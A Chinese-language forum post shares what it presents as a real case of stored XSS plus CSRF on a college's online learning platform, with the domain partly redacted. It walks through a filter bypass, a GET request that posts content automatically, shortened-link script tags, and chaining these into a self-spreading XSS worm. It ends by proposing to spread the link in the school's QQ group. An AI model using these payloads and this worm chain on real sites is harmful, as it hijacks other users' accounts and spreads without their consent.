1) 可绕过的XSS

给大家分享个漏洞案例，今天上午刚把电脑修好
某技术学院储存XSS+CSRF（XSS绕过滤到蠕虫攻击）
注册处：http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表，先说下储存XSS，过滤了，发现可绕过
储存XSS：http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先过滤再输出，而不是输出时过滤，从而导致可绕过 

我们发现他输入时就进行了过滤，直接替换<script>alert('XSS')</script>成功弹框：

同样是这个位置，发表话题，改成get请求 

得到连接：
CSRF：

http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE

点击链接会自动发表内容
我们缩短一下链接 网上有在线缩短的，缩短后链接http://suo.im/abc
构造一下csrf连接：<script src=http://suo.im/abc></script>（插入到网页当中，当别人访问你的个人中心，会自动发表一个内容）
接着我们继续构造，找到CSRF漏洞处，把后面的内容替换为CSRF链接，也就是访问此连接会自动发表内容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

继续缩短网址：
缩短后：http://suo.im/XXXX这个时候我们再调用一下CSRF+XSS的地址：

<script src=http://suo.im/XXXX></script>

把这个链接插入到网页当中即可完成XSS蠕虫攻击
当A访问你的主页时，A会发表和你一样的内容，当B访问A的主页时，B会发表和A一样的内容，同理，完成XSS蠕虫攻击

最后的思路就是自己构造个网站，加这个学校的QQ群，发送链接哈哈。